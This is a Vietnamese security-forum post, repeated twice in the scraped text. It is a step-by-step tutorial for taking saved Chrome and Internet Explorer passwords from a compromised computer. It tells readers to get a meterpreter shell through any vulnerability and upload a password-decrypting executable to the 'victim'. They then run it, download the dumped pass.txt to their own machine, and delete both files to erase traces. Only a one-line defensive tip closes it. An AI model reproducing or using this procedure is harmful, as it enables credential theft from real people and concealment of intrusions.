DDos
VIP Members
-
22/10/2013
-
524
-
2.191 bài viết
Lấy mật khẩu đã lưu trong trình duyệt Google-Chrome và IE từ máy tính đã bị xâm nhập
Hiện nay, mình thấy một thực trạng khá phổ biến là khi mọi người đăng nhập vào một trang web nào đó, bạn luôn nhớ mật khẩu để dễ dàng và tránh phải nhập cho lần sau. Đứng trên góc độ của người dùng bình thường thì nó không có ý nghĩa gì cả, nhưng đứng trên góc độ bảo mật thì đó là một mối nguy hiểm. Trong topic này mình sẽ hướng dẫn các bạn lấy mật khẩu đã lưu trong trình duyệt của một máy tính đã bị thâm nhập. Bài này mình sẽ hướng dẫn lấy mất khẩu đã lưu trong trình duyệt Google-Chrome và IE, bài sau sẽ là Firefox.
Yêu cầu: ChromePasswordDecryptor.exe. Các bạn có thể download ở đây:
Bước 1: Dành một meterpreter shell bằng cách sử dụng bất kỳ một lỗ hổng nào đó về hệ thống. Bạn có thể tham khảo bài viết trước của mình ở đây.
Bước 2: Download file ChromePasswordDecryptor.exe và upload tới nạn nhân của bạn.
Bước 3: Thực thi file bằng cách sử dụng lệnh sau:
ChromePasswordDecryptor.exe "pass.txt"
Bước 4: Download file pass.txt đã trích xuất được từ bước 3
download pass.txt /root/Desktop
Bước 5: Xóa dấu vết bằng cách xóa cả file thực thi và file pass.txt đã được trích ra
rm ChromePasswordDecryptor.exe
rm pass.txt
Để rõ hơn các bạn xem video sau:
Qua đây, mình nhắc nhỏ mọi người là luôn cập nhật phần mềm diệt virus và hệ điều hành tới phiên bản mới nhất và không click vào bất kỳ một link lạ nào đó. Và tốt hơn hết là không nên lưu mật khẩu vào trình duyệt.
Cảm ơn vì đã đọc bài viết của mình!
Yêu cầu: ChromePasswordDecryptor.exe. Các bạn có thể download ở đây:
HTML:
http://adf.ly/Ychl0
Bước 1: Dành một meterpreter shell bằng cách sử dụng bất kỳ một lỗ hổng nào đó về hệ thống. Bạn có thể tham khảo bài viết trước của mình ở đây.
HTML:
http://whitehat.vn/threads/4886-Bypass-antivirus-va-get-mot-meterpreter-su-dung-Veil.html
Bước 2: Download file ChromePasswordDecryptor.exe và upload tới nạn nhân của bạn.
Bước 3: Thực thi file bằng cách sử dụng lệnh sau:
ChromePasswordDecryptor.exe "pass.txt"
Bước 4: Download file pass.txt đã trích xuất được từ bước 3
download pass.txt /root/Desktop
Bước 5: Xóa dấu vết bằng cách xóa cả file thực thi và file pass.txt đã được trích ra
rm ChromePasswordDecryptor.exe
rm pass.txt
[video=youtube;G1dw2qt9sqg]http://www.youtube.com/watch?feature=player_embedded&v=G1dw2qt9sqg[/video]
Qua đây, mình nhắc nhỏ mọi người là luôn cập nhật phần mềm diệt virus và hệ điều hành tới phiên bản mới nhất và không click vào bất kỳ một link lạ nào đó. Và tốt hơn hết là không nên lưu mật khẩu vào trình duyệt.
Cảm ơn vì đã đọc bài viết của mình!
Chỉnh sửa lần cuối bởi người điều hành: